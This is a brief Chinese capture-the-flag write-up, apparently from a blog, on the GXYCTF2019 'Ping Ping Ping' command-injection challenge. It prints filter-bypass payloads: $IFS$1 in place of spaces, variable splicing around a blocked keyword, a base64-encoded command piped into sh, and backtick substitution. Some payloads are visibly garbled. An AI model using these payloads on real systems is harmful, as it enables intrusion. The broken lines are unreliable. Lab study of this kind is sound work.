[GXYCTF2019]Ping Ping Ping1

打开靶机

结合题目名称,考虑是命令注入,试试ls

结果应该就在flag.php。尝试构造命令注入载荷。 cat flag.php

可以看到过滤了空格,用 $IFS$1替换空格

还过滤了flag,我们用字符拼接的方式看能否绕过,a=g;cat$IFS1flaa.php。注意这里用分号间隔,所以不能用管道符连接了。

可以看到flag了。这里有个坑,这段是纯php代码,所以在页面上没有显示出来,要注意观察界面的源码。

其实可以先看一下index.php

基本上可以看到过滤了哪些内容。所以还可以用base64编码绕过过滤

echo$IFS1Y2F0IGZsYWcucGhw\|base64IFS$1-d|sh

既然ls能把flag找出来, 则还可以利用内联的方式获取flag cat$IFS$1`ls`

放一个命令注入的介绍:命令注入以及常见绕过方式_命令注入如何绕过空色-CSDN博客

相关推荐
学习溢出5 小时前
【网络安全】John the Ripper 散列密码,PDF密码
安全·网络安全·pdf·哈希算法
为几何欢5 小时前
【hackmymv】emma靶机wp
安全·网络安全·渗透·hackmyvm·hmv
士别三日wyx7 小时前
HW护网分析研判思路,流量告警分析技巧
安全·web安全·网络安全
茶颜悦色vv9 小时前
Wireshark(1)
网络·web安全·网络安全·wireshark
纯净的灰〃9 小时前
vulnhub-matrix-breakout-2-morpheus
安全·web安全·网络安全
愿得一人欣10 小时前
工具大全-dirsearch探测Web目录
网络安全·ctf比赛工具·渗透工具大全
D1TAsec10 小时前
编译型语言的痛!但无文件落地我可以!!!
网络安全
安全方案1 天前
如何识别钓鱼邮件和诈骗网站?(附网络安全意识培训PPT资料)
网络安全·安全培训
H轨迹H1 天前
SolidState靶机通关教程及提权
网络安全·渗透测试·靶机·oscp